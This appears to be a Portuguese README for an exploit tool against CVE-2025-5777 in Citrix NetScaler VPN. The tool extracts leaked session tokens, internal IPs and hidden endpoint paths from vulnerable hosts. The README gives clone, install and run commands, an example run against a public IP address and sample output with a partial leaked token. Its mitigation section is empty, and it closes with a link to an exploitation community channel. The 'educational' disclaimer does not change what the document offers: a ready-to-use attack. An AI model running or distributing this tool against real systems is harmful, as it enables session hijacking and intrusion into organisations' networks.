
Ferramenta de exploração baseada em async para CVE-2025-5777 que detecta e extrai tokens de autenticação vazados, IPs internos e caminhos de endpoints ocultos de endpoints VPN Citrix NetScaler vulneráveis.
Uma poderosa ferramenta educacional projetada para demonstrar e analisar a vulnerabilidade CVE-2025-5777 que afeta o Citrix NetScaler VPN.
Este projeto faz parte da iniciativa GO-TO CVE.
⚠️ Apenas para fins educacionais. NÃO use em sistemas que você não possui ou para os quais não tem permissão explícita de teste.
Este script tenta detectar e extrair tokens internos sensíveis, IPs internos e caminhos de endpoints ocultos expostos por endpoints VPN Citrix vulneráveis.
Ele foi criado para ajudar estudantes, pesquisadores de segurança e red teamers a entender melhor como CVEs do mundo real são descobertas e analisadas.
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Requer Python 3.8+ Opcional: Você pode usar um ambiente virtual
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 para rotear através do Burp/SOCKS--silent para suprimir a saída--output result.json para salvar em JSONExemplo:
python3 exploit.py https://20.237.190.100 --output leaks.json

[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
e

Para evitar a exploração desta CVE:
Esta ferramenta é disponibilizada estritamente para fins educacionais e de pesquisa lícitos. O desenvolvedor não assume nenhuma responsabilidade por qualquer uso indevido ou atividade ilegal realizada com este código.
Ao usar esta ferramenta, você concorda que:
Junte-se à comunidade de pesquisa de vazamentos e exploração de CVEs: 👉 https://t.me/GOTOCVE
Desenvolvido por Ali Soltani – red teamer e caçador de CVEs.
Orgulhosamente parte do GO-TO CVE